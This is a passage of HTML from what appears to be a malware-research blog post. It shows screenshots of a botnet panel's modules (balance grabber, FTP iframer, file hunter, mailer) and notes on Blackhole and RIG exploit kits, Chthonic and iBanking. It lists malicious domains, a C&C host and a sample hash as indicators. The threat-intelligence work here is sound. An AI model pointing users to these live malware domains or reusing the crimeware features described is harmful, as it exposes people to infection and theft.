href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijPTK0n4NjV_RNIp3CwRjoeloP9JtOXtYKGxHs1yp5U3W-fY7ldFrUoIqo7x8kaqKTsQSzQolAF0Q3SjzrFCceai_w6QbxX2qNa44ZVvlgMVGlHdXyzxt88-RLF1VeJ34Vqc0newN_yEQ/s1600/2015-11-02_17-05-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijPTK0n4NjV_RNIp3CwRjoeloP9JtOXtYKGxHs1yp5U3W-fY7ldFrUoIqo7x8kaqKTsQSzQolAF0Q3SjzrFCceai_w6QbxX2qNa44ZVvlgMVGlHdXyzxt88-RLF1VeJ34Vqc0newN_yEQ/s400/2015-11-02_17-05-38.png" width="400" /></a></div> <br /> CMD parser:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UsSBRl7LfFD7ejKy0a8T5_p_4aVVwN0_p3XNcvffooTHmVHnnTBMGkYft_Q10TowGeQVpsQW-F80dtmkcroh4coxrvipqmHVsEk4fhCq2SJ90vr7dnWpAzrUwGPNgJumRJVnVUutMr0/s1600/2015-11-02_17-07-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="285" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3UsSBRl7LfFD7ejKy0a8T5_p_4aVVwN0_p3XNcvffooTHmVHnnTBMGkYft_Q10TowGeQVpsQW-F80dtmkcroh4coxrvipqmHVsEk4fhCq2SJ90vr7dnWpAzrUwGPNgJumRJVnVUutMr0/s400/2015-11-02_17-07-26.png" width="400" /></a></div> <br /> Neuromodel:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKZr7Hex_B2Ff5Js5yfea2IELE66a0cR4f8IXymqRbp8FNBYEP-3SDvXb90D0RLyhXVmdoIVAkn-aVcU3P-L4oz1qkOKQTMAkqF22Yc7loIeBTBLmw2uywyD6-EYbfm3hMDxPgcux910/s1600/2015-11-02_17-09-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBKZr7Hex_B2Ff5Js5yfea2IELE66a0cR4f8IXymqRbp8FNBYEP-3SDvXb90D0RLyhXVmdoIVAkn-aVcU3P-L4oz1qkOKQTMAkqF22Yc7loIeBTBLmw2uywyD6-EYbfm3hMDxPgcux910/s400/2015-11-02_17-09-14.png" width="381" /></a></div> <br /> Edit:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTA6xZRH8NIYTESH8f0Y684AvmZ3UVD5iSBel8P96Sigk2-Mdu4_I4fMQ0GK7JqFqSRQcf4hKpyUvKumeieOU1VMRf0NrjGo05uFqQRNJf1BN2B1IKFr47FKPn8iSEL7WVku6GAOZ7MDQ/s1600/2015-11-02_17-10-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTA6xZRH8NIYTESH8f0Y684AvmZ3UVD5iSBel8P96Sigk2-Mdu4_I4fMQ0GK7JqFqSRQcf4hKpyUvKumeieOU1VMRf0NrjGo05uFqQRNJf1BN2B1IKFr47FKPn8iSEL7WVku6GAOZ7MDQ/s400/2015-11-02_17-10-54.png" width="381" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRKJelP4ucKx2-9ZUCNzDEFA5ZpbmvI9U2Aq2qkHlOb2MI0Jgy_JqUf6oZcxJray2s86dNjjmYa0tuZTgIzGABKTJHzYI-dfiefosnJ6sY82T0c8FmvBtNOo6HrNWdtxdtG_AEvejhFM/s1600/2015-11-02_17-13-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXRKJelP4ucKx2-9ZUCNzDEFA5ZpbmvI9U2Aq2qkHlOb2MI0Jgy_JqUf6oZcxJray2s86dNjjmYa0tuZTgIzGABKTJHzYI-dfiefosnJ6sY82T0c8FmvBtNOo6HrNWdtxdtG_AEvejhFM/s1600/2015-11-02_17-13-41.png" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuhyjEjrD9GnmCEBoUHe9TWWrFQOhyphenhyphen7jys1oaVeU2z5upbS4Seb7C-rtA296BCixKlESurijopi8d-Jg5N4y6Kq13Nv2jBJTu6rPYKOrPx8GKC3hCDYvZ_7OPOHh4s0ubXEe8gD17LTiE/s1600/2015-11-02_17-20-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuhyjEjrD9GnmCEBoUHe9TWWrFQOhyphenhyphen7jys1oaVeU2z5upbS4Seb7C-rtA296BCixKlESurijopi8d-Jg5N4y6Kq13Nv2jBJTu6rPYKOrPx8GKC3hCDYvZ_7OPOHh4s0ubXEe8gD17LTiE/s1600/2015-11-02_17-20-53.png" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvtj3IJ9AYykVMpRdtPutT_v0mXkQ0IjpY3qO1S7rCfWobD_RnEyR4fPFH6t09GqwfdudUWBRBPiXUVkO8TsxUOdpCja75a9IywJMIjvew_X2X7gw-dxfgoF8f_s2dTXWYQ_sZox2VMZ0/s1600/2015-11-02_17-21-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvtj3IJ9AYykVMpRdtPutT_v0mXkQ0IjpY3qO1S7rCfWobD_RnEyR4fPFH6t09GqwfdudUWBRBPiXUVkO8TsxUOdpCja75a9IywJMIjvew_X2X7gw-dxfgoF8f_s2dTXWYQ_sZox2VMZ0/s1600/2015-11-02_17-21-30.png" /></a></div> <br /> Links:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUyA4vn3sf_0cdyrpyWyxYt4mTvgKb-KZ7PMIU5rXUP43jglAC_lRSk3Gq1-MatJQaaxSlu3Fcrc0-RBRJVqI730KbDZtpUWUpwI7WQGW77-5onBcjTv_43Y9U8QC76bh61gZ93A3a-Fc/s1600/2015-11-02_17-22-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUyA4vn3sf_0cdyrpyWyxYt4mTvgKb-KZ7PMIU5rXUP43jglAC_lRSk3Gq1-MatJQaaxSlu3Fcrc0-RBRJVqI730KbDZtpUWUpwI7WQGW77-5onBcjTv_43Y9U8QC76bh61gZ93A3a-Fc/s400/2015-11-02_17-22-03.png" width="381" /></a></div> <br /> Balance grabber:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtB9ZIslbjrTAQV5Vx_np1MkEOTGwAY0xeSfVIT6Ydt2lAJkyBKc0GbT8ZQ9BsBCnBVk6ptBdu7tuq1WDQW9hZMxVO3GbgqPaNP6D4JVRz3WhujgkPLjEIaE4sxn4tQdXYEoKsI7Yvq-U/s1600/2015-11-02_17-23-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtB9ZIslbjrTAQV5Vx_np1MkEOTGwAY0xeSfVIT6Ydt2lAJkyBKc0GbT8ZQ9BsBCnBVk6ptBdu7tuq1WDQW9hZMxVO3GbgqPaNP6D4JVRz3WhujgkPLjEIaE4sxn4tQdXYEoKsI7Yvq-U/s400/2015-11-02_17-23-08.png" width="381" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvoS9iUntBQWnoBYU9oBv8Lyg1_dmMVJHpuQKTYTepRuM-VMPPgtwL_fKnMyt3MuleIaNUeXapf1jUuYyM9KYvaGZ4QPOPGXMoORiDgY8pUmkf1nVZcxE5UuIAqjkVpZDwuxTj0FDOiZM/s1600/2015-11-02_20-03-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvoS9iUntBQWnoBYU9oBv8Lyg1_dmMVJHpuQKTYTepRuM-VMPPgtwL_fKnMyt3MuleIaNUeXapf1jUuYyM9KYvaGZ4QPOPGXMoORiDgY8pUmkf1nVZcxE5UuIAqjkVpZDwuxTj0FDOiZM/s1600/2015-11-02_20-03-29.png" /></a></div> Config:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi098G5LmFrinpRL4TVMCE5d20yKhEk9nnGaXoEayqT851PJCZgkAB5O70yQtJqKC9o_xT7Y4ACygR3xRJzXgoVzuSwu1U3bBiQdyAFDWJ2a5WXjQxk27X1KXY33KbEURJyu3xDZNkEQJQ/s1600/2015-11-02_19-59-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi098G5LmFrinpRL4TVMCE5d20yKhEk9nnGaXoEayqT851PJCZgkAB5O70yQtJqKC9o_xT7Y4ACygR3xRJzXgoVzuSwu1U3bBiQdyAFDWJ2a5WXjQxk27X1KXY33KbEURJyu3xDZNkEQJQ/s400/2015-11-02_19-59-13.png" width="400" /></a></div> Activity:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD-6OasJd8SbaJvSnyC9zXOU7D2FNElO8BzI-1JzSUyxE-6G2cyRW-xsdZsG15VkbPWp3909KNJDIG68osruQATFl34gcE2xh7X5591P40Tqi6bqoWQtpRh_N93U7tHj8TK1PQW3Wl2AQ/s1600/2015-11-02_20-01-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjD-6OasJd8SbaJvSnyC9zXOU7D2FNElO8BzI-1JzSUyxE-6G2cyRW-xsdZsG15VkbPWp3909KNJDIG68osruQATFl34gcE2xh7X5591P40Tqi6bqoWQtpRh_N93U7tHj8TK1PQW3Wl2AQ/s400/2015-11-02_20-01-18.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEnDnOuI8TnEIomTxhbeJ7lt81Bd3ttz7z4lcA20wauB_GbIV-WTjIOFkIBbA5HNoTLMoPouwKc4DX_PpF4Nyb1GCYoYko3DksdiqVBZkJTwu8ZBCs2oXlaB4VfCDivz_DNQehnXhUsd4/s1600/2015-11-02_20-01-49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEnDnOuI8TnEIomTxhbeJ7lt81Bd3ttz7z4lcA20wauB_GbIV-WTjIOFkIBbA5HNoTLMoPouwKc4DX_PpF4Nyb1GCYoYko3DksdiqVBZkJTwu8ZBCs2oXlaB4VfCDivz_DNQehnXhUsd4/s400/2015-11-02_20-01-49.png" width="400" /></a></div> <br /> Jabber notifier:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeyrYAzh156flD_RcwFhWngIzqUy09w-kynkIL2gRZfgXx-T0cM9j9V5d8E-uWtbQvQbQuGrReeQHldIHUwGbuCf5I33EP9F82qvDjs1ubm_AsUpq9MpUZCcSoAU6MKPqRFrS03gyMP8/s1600/2015-11-02_17-23-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLeyrYAzh156flD_RcwFhWngIzqUy09w-kynkIL2gRZfgXx-T0cM9j9V5d8E-uWtbQvQbQuGrReeQHldIHUwGbuCf5I33EP9F82qvDjs1ubm_AsUpq9MpUZCcSoAU6MKPqRFrS03gyMP8/s400/2015-11-02_17-23-53.png" width="400" /></a></div> <br /> Notes:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH4b5roZmJTTnA-n2ZH2gp-XvfsJv8ULYLzKnitPfe3g9eTG-NN-DdW_dtbZObHVBdy6LKu2l0bHw5p0peVV14EGIOEL5kRTJSXKBNmDn4qfx45gAuw7pSZOu2aHwJw7gLj0vEdGr0Vog/s1600/2015-11-02_17-24-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH4b5roZmJTTnA-n2ZH2gp-XvfsJv8ULYLzKnitPfe3g9eTG-NN-DdW_dtbZObHVBdy6LKu2l0bHw5p0peVV14EGIOEL5kRTJSXKBNmDn4qfx45gAuw7pSZOu2aHwJw7gLj0vEdGr0Vog/s400/2015-11-02_17-24-43.png" width="377" /></a></div> <br /> Crypt exe:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeGbEzWhz-uHu1YVTpdcLzahX3rPp-Nf-3LFlPYJbChpZ5OAJeD3YpLOTM2TeewH8v6WTyRSpr8RTsd-ubm6Pyr1WzOgBj-32Qpp-pqs-Mu4EOTqdnNMzNnuvBf3YpNxe2G3LQJG_UxU/s1600/2015-11-02_17-25-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJeGbEzWhz-uHu1YVTpdcLzahX3rPp-Nf-3LFlPYJbChpZ5OAJeD3YpLOTM2TeewH8v6WTyRSpr8RTsd-ubm6Pyr1WzOgBj-32Qpp-pqs-Mu4EOTqdnNMzNnuvBf3YpNxe2G3LQJG_UxU/s400/2015-11-02_17-25-11.png" width="377" /></a></div> <br /> FTP iframer:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw13pSslNilImVo-pbTZVnUhAE0xEGjr39cvfMBpa35-7keE4gGY0TlHDk9IzbLe47DW06Zp1WbJhbv3hMkBTmN7Ar67hEeyFmU5yxvdUvlZQ5_pnAzDefwDvoGzXRXB3rrpILtdN6IQk/s1600/2015-11-02_17-25-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw13pSslNilImVo-pbTZVnUhAE0xEGjr39cvfMBpa35-7keE4gGY0TlHDk9IzbLe47DW06Zp1WbJhbv3hMkBTmN7Ar67hEeyFmU5yxvdUvlZQ5_pnAzDefwDvoGzXRXB3rrpILtdN6IQk/s400/2015-11-02_17-25-56.png" width="400" /></a></div> Config:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMhDdRWZ9VwXc4CkE-FD83toNRVhtCZMyyYkIh-HrXdbg-nzFjV36X_pk975vhOxe90xiKjmbmpBclQhWOAE3_bnxVTCVPvIlIBPRjzCcaUeruNpr0tINhq0DEOC8T3xUfItRQdvQzeo/s1600/2015-11-02_20-05-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOMhDdRWZ9VwXc4CkE-FD83toNRVhtCZMyyYkIh-HrXdbg-nzFjV36X_pk975vhOxe90xiKjmbmpBclQhWOAE3_bnxVTCVPvIlIBPRjzCcaUeruNpr0tINhq0DEOC8T3xUfItRQdvQzeo/s400/2015-11-02_20-05-17.png" width="338" /></a></div> <br /> Iframe lead on a Keitaros TDS who lead on malware:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjnOtvH2RxTEc-blqs1tM9Z4pBsLJaGXprdGjaACJZlbodPWHc_870RMljNar8BRyeDICkU4SIwe73jbf3SEzZ9dw0w2J0FtIIEJEB31ujaKkjDFHZqzymC_y8uJpLowqUv1fp2RrYOFI/s1600/2015-11-22_14-59-50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjnOtvH2RxTEc-blqs1tM9Z4pBsLJaGXprdGjaACJZlbodPWHc_870RMljNar8BRyeDICkU4SIwe73jbf3SEzZ9dw0w2J0FtIIEJEB31ujaKkjDFHZqzymC_y8uJpLowqUv1fp2RrYOFI/s400/2015-11-22_14-59-50.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPc_262ZYR73-Mw3TPTRoDQt0XotDSen4ihTsja1G_QtXV4h-XwmkIqyJ4L5a5NdXAocj76sCfYnX7ltOfWJ_lehs3j6yuZek1Gmju6YASw2ryUNFDItDxAiOXsAKnASejLyv2m17jYyw/s1600/2015-11-22_15-00-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPc_262ZYR73-Mw3TPTRoDQt0XotDSen4ihTsja1G_QtXV4h-XwmkIqyJ4L5a5NdXAocj76sCfYnX7ltOfWJ_lehs3j6yuZek1Gmju6YASw2ryUNFDItDxAiOXsAKnASejLyv2m17jYyw/s400/2015-11-22_15-00-51.png" width="400" /></a></div> <br /> That right, second one is a blackhole exploit kit.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9Vc5NyFn32qEgexiznCewbU5fllBhexYt6tVwD-uoo_xjTmzWHO_p5Cp9SrlQAcYkj7FCTGvTDchjcN-U0HIbXUmwh4I19qh2mwTy-0TznZZm2RSO9yRvYuVOjiC5z7XCo4xUntWuI0/s1600/2015-11-22_15-03-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9Vc5NyFn32qEgexiznCewbU5fllBhexYt6tVwD-uoo_xjTmzWHO_p5Cp9SrlQAcYkj7FCTGvTDchjcN-U0HIbXUmwh4I19qh2mwTy-0TznZZm2RSO9yRvYuVOjiC5z7XCo4xUntWuI0/s400/2015-11-22_15-03-23.png" width="271" /></a></div> <br /> Jérôme Segura of MalwareBytes have wrote about this one here: <a href="https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/">https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/</a><br /> First one is RIG exploit kit delivering Chthonic targeting Russia and Ukraine.<br /> And for update-flashplayer.ml, update-flash-security.ml, they lead to iBanking download.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEh-Jjp1BQpt_DAlO4K2l0A5DSgVmTmpn3RhK3QQi_XiU-K0KOjtiNj-mqEBIa6DOe59K5Ey1h4bnUU5wzPjnjahmMCfhWec1lbFJ4HhNm1TuRDMdkXYFwH_psC10JfUg1iAptXNU7WZw/s1600/2015-11-22_17-16-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEh-Jjp1BQpt_DAlO4K2l0A5DSgVmTmpn3RhK3QQi_XiU-K0KOjtiNj-mqEBIa6DOe59K5Ey1h4bnUU5wzPjnjahmMCfhWec1lbFJ4HhNm1TuRDMdkXYFwH_psC10JfUg1iAptXNU7WZw/s400/2015-11-22_17-16-46.png" width="302" /></a></div> SHA1: E536E23409EBF015C500D5799AD8C70787125E95<br /> <br /> CNC at templatehtml.ru<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHZEP8JuSl4E8yQoyAks_ucmk4CJg46o9IS2mCcx6gfyvuyymHyk2diBN5bC_Dr4gQdVS9CTNaNYieAMd4hpeqYhhR4CFEYvI5v9nRSdDF04T97ajUCjE5s2xMARnHh1YlEBq7q834Jm0/s1600/2015-11-22_16-53-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHZEP8JuSl4E8yQoyAks_ucmk4CJg46o9IS2mCcx6gfyvuyymHyk2diBN5bC_Dr4gQdVS9CTNaNYieAMd4hpeqYhhR4CFEYvI5v9nRSdDF04T97ajUCjE5s2xMARnHh1YlEBq7q834Jm0/s400/2015-11-22_16-53-18.png" width="400" /></a></div> <br /> To get back on the original subject, here is the File hunter:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw7kWQoopquqFkQ87i9g4TpYv2yYfyu1wsmY5gHDHj67OGg1tn9ZUbtdXjNH44hCWmLoCmCrwYzEoJwKLZSGPa9rabUGreCXA1VoHeKHMZkpXx6qfhrNLrkLsBaBwoHriClNOGugyEIn8/s1600/2015-11-02_17-32-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw7kWQoopquqFkQ87i9g4TpYv2yYfyu1wsmY5gHDHj67OGg1tn9ZUbtdXjNH44hCWmLoCmCrwYzEoJwKLZSGPa9rabUGreCXA1VoHeKHMZkpXx6qfhrNLrkLsBaBwoHriClNOGugyEIn8/s400/2015-11-02_17-32-47.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLtWWwNPgSC-Qm8tPF89mQAa4wAjryDfwOhcEsYY1rZLyn6dvaFpQSTvhpikHF_cjTpYe5n6FYG9_tH3zDtcQtfeurNbOg3pduKgggyPwbIxXn_Pb9m2Meli-KPEX3uUfeSVY6io_0aM/s1600/2015-11-03_23-23-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLtWWwNPgSC-Qm8tPF89mQAa4wAjryDfwOhcEsYY1rZLyn6dvaFpQSTvhpikHF_cjTpYe5n6FYG9_tH3zDtcQtfeurNbOg3pduKgggyPwbIxXn_Pb9m2Meli-KPEX3uUfeSVY6io_0aM/s400/2015-11-03_23-23-47.png" width="400" /></a></div> <br /> Downloaded:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFjibZnO5I-cwKfAaJO4574NbjRSiFY-OpmUuxScUJY-trs5W9FaDk7wjDznehN8b9WtdL7pdolrOk24KR3iGKGGzDuMa5Ms7j-rlVew0GE8ol0ghyphenhyphenVgpuoQVpDcbbhd8DZG3YxagNFYQ/s1600/2015-11-02_20-12-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFjibZnO5I-cwKfAaJO4574NbjRSiFY-OpmUuxScUJY-trs5W9FaDk7wjDznehN8b9WtdL7pdolrOk24KR3iGKGGzDuMa5Ms7j-rlVew0GE8ol0ghyphenhyphenVgpuoQVpDcbbhd8DZG3YxagNFYQ/s400/2015-11-02_20-12-21.png" width="400" /></a></div> Trash:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijl93LkEzBVM8usKi72JxKkIIM7zufFzpgZqgP5a0Cjy_2hkiB9qqXFkzOP-eqQbmR_WYHT-kdG4HlqHSNOILPGG-L3EkfD8X1lO7QWZViIEB9xkSrcy1vBD8igMv7pQdDZAHkiaNyGmk/s1600/2015-11-02_20-13-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijl93LkEzBVM8usKi72JxKkIIM7zufFzpgZqgP5a0Cjy_2hkiB9qqXFkzOP-eqQbmR_WYHT-kdG4HlqHSNOILPGG-L3EkfD8X1lO7QWZViIEB9xkSrcy1vBD8igMv7pQdDZAHkiaNyGmk/s400/2015-11-02_20-13-39.png" width="400" /></a></div> <br /> Mailer:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wl0uTwP3cT8zF6p6wd3AkANxPb88ofPCQDd9CbwV80d8A9LoXJUv1k2ZOec3ACi2WqcFcrHshD9dmgOlMo8nDJXrvvV50d7O-Bu6dI41ySBLX-MaYXNaoaauNVAaRl02DwbXvN0R7cI/s1600/2015-11-02_17-33-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wl0uTwP3cT8zF6p6wd3AkANxPb88ofPCQDd9CbwV80d8A9LoXJUv1k2ZOec3ACi2WqcFcrHshD9dmgOlMo8nDJXrvvV50d7O-Bu6dI41ySBLX-MaYXNaoaauNVAaRl02DwbXvN0R7cI/s400/2015-11-02_17-33-32.png" width="400" /></a></div> Config:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj10lRolKK6kTLeuX86MGKS5Iz28enmOpa5pEhcwd1IXHTycTTJ2iey5wyilrIKHQMhJYC8lExaOSqLDIFZH3tFMp9h88TR8zafIR8_qSKNIqU3kn3xQNHZpZr6Y5kwM4hrXVLm3f_ONIw/s1600/2015-11-02_20-10-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj10lRolKK6kTLeuX86MGKS5Iz28enmOpa5pEhcwd1IXHTycTTJ2iey5wyilrIKHQMhJYC8lExaOSqLDIFZH3tFMp9h88TR8zafIR8_qSKNIqU3kn3xQNHZpZr6Y5kwM4hrXVLm3f_ONIw/s400/2015-11-02_20-10-05.png" width="400" /></a></div> <br /> Mail:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaJ4f-jgxTEzG4HPYnvs0RfsXyrFaa_yV_c6e5P1xlX2gZ8Y4UqZ-UtZtbdzcVwhqG70PN3N-qVYIT0o2J_NZic7jOgqKitP2vZeXhWoLcoG72UnNpdd1_7P9micuo0Q8nfRPjEVGZ5o/s1600/2015-11-29_16-48-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaJ4f-jgxTEzG4HPYnvs0RfsXyrFaa_yV_c6e5P1xlX2gZ8Y4UqZ-UtZtbdzcVwhqG70PN3N-qVYIT0o2J_NZic7jOgqKitP2vZeXhWoLcoG72UnNpdd1_7P9micuo0Q8nfRPjEVGZ5o/s400/2015-11-29_16-48-28.png" width="400" /></a></div> <br /> <br /> Informations:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCW3BYly98xYPlsMADjxOUkO39Kbrky1P4IXQ_pi63cMyll9-rkhOV_vaEvJkHvzBGLLJPeDfRQR1lFZjvlEHg4aYUIOtHcTVh73hGhi92N7FEThlDLkXydTUQ52L9Rp400oqZPn9fbeg/s1600/2015-11-02_17-34-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCW3BYly98xYPlsMADjxOUkO39Kbrky1P4IXQ_pi63cMyll9-rkhOV_vaEvJkHvzBGLLJPeDfRQR1lFZjvlEHg4aYUIOtHcTVh73hGhi92N7FEThlDLkXydTUQ52L9Rp400oqZPn9fbeg/s400/2015-11-02_17-34-01.png" width="400" /></a></div> <br /> Options:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSdgqk2Qs3fbzpEnSlpwxpjzXZk2PlgM9qtIh5Y5kcH3qYU8SfQDVcYlZI9Y7Je-hDXizjr1ZfOcmqpkolCzVfuHL7_DEVbx61qenqyxIoKFrvqPWvxw6W1d0SsTdSQbei5ho-VrrA3zQ/s1600/2015-11-02_17-35-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" 